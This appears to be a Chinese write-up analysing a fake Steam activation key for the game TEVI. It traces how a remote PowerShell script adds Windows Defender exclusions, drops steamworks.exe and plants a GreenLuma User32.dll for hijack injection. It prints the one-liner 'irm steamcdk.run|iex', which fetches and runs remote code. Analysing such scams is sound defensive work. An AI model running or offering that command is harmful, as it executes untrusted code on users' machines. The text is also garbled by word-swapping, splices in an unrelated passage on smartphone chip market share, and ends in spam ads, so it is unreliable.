-
友情链接:
在某宝买了一个伪造的steam游戏激活码,要激活的游戏名TEVI,浅显分析一下系数这个词入库经由
01 irm steamcdk.run|iex 行径分析该辅导探望域名为steamcdk.run的网页并实施其剧本
在剧本中检测了处置员权限
接着,剧本尝试取得 Steam 的装配旅途,并查抄 Windows Defender 是否正在脱手。要是 Windows Defender 正在脱手,则将 Steam 装配旅途添加到 Windows Defender 的摒除旅途中。
然后从图中麇集下载steamworks.exe到steam目次中
临了脱手该门径
02 steamworks.exe行径分析
检察steamworks.exe的信息,是一个C++愚弄门径
给与脱手steamworks.exe,会强制退出steam平台的程度
接着steamworks.exe开释python守旧库到临时文献夹中,其中background.jpg等3张图片是steam序列号激活游戏的界面
门径实施几秒后弹出界面
由于此时steam已强制退出,不难猜到该界面恰是刚刚提到的临时文献夹中的图片画图而成
将某宝店家提供给咱们的CDK提交,发现通过收罗下载了文献2230650.zip
通过steamdb查询咱们要激活的游戏TEVI,发现TEVI的ID恰是2230650
解压2230650.zip后得到
其中包含了TEVI的清单文献2230651_5704585057152086627.manifest和密钥文献
根据市场调研机构Canalys的数据,联发科在智能手机处理器市场占据第一位,市场份额达到39%,高通以25%的份额紧随其后,苹果以16%的份额位列第三。而在第四位则是紫光展锐,市场份额达到了9%。
揣摸是由steam免费入库器用SteamTools生成
澄澈店家提供给咱们的"游戏CDK"骨子上是游戏的记号ID,通过该ID下载对应的游戏免费入库包
接着steamworks.exe将TEVI的清单文献2230651_5704585057152086627.manifest拷贝到steam目次下的depotcache文献夹中,况兼修改了包括config.vdf在内的一部分拨置文献
然后在steam目次下写入一个User32.dll
03 User32.dll行径分析澄澈User32.dll是为了劫抓注入,在IDA中检察发现具有GreenLuma字符串
通过搜索引擎查找GreenLuma,发现这亦然一个steam入库器用
澄澈steamworks.exe通过GreenLuma进行劫抓注入,通过之前得到的TEVI的清单文献2230651_5704585057152086627.manifest和密钥文献进行解锁
临了,弹出激活生效的窗口并重启steam
[培训]科锐软件逆向50期预科班报名行将放手微博小号怎么买多少钱,速来!!! 50期崇拜班报名火爆招生中!!!